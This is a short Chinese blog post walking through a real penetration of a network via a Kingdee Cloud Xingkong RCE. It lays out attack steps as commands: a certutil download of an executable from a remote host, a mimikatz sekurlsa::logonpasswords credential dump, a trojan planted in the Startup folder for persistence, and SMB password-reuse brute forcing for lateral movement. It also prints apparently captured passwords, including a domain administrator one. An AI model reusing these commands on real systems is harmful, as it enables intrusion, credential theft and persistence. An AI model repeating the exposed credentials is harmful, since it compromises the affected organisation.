真实案例,厚码见谅,有些步骤可能有些忘记,截图并不是很全面。
金蝶云星空RCE
shell之后尝试上线(出网)
certutil -urlcache -split -f http://xx.xx.xx.xx/test.exe c:\test.exe
这里exe的位置只是一个示例,正常都是在tmp目录下的
有CS的话,就上传frp
本机信息收集
上传mimikatz收集密码本
mimikatz收集密码
mimikatz.exe “privilege::debug” “log” “sekurlsa::logonpasswords full”
get一个密码,乍一看还有域administrator/@qweadmin5656
之后在翻取文件的地方,发现有个密码HAO&^&123
维权
这里因为是简单的市护网,没人应急,维权就把exe的木马文件放到启动目录下C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp
内网横向
之后就是fscan的扫描
先简单的使用密码本进行横向扫描,针对445端口进行密码复用的爆破。
因为SMB密码和RDP的密码是一样的。并且SMB的爆破速度比RDP更快。
这里获取了大概五六个权限,就可以放开去扫了
© 版权声明
THE END
暂无评论内容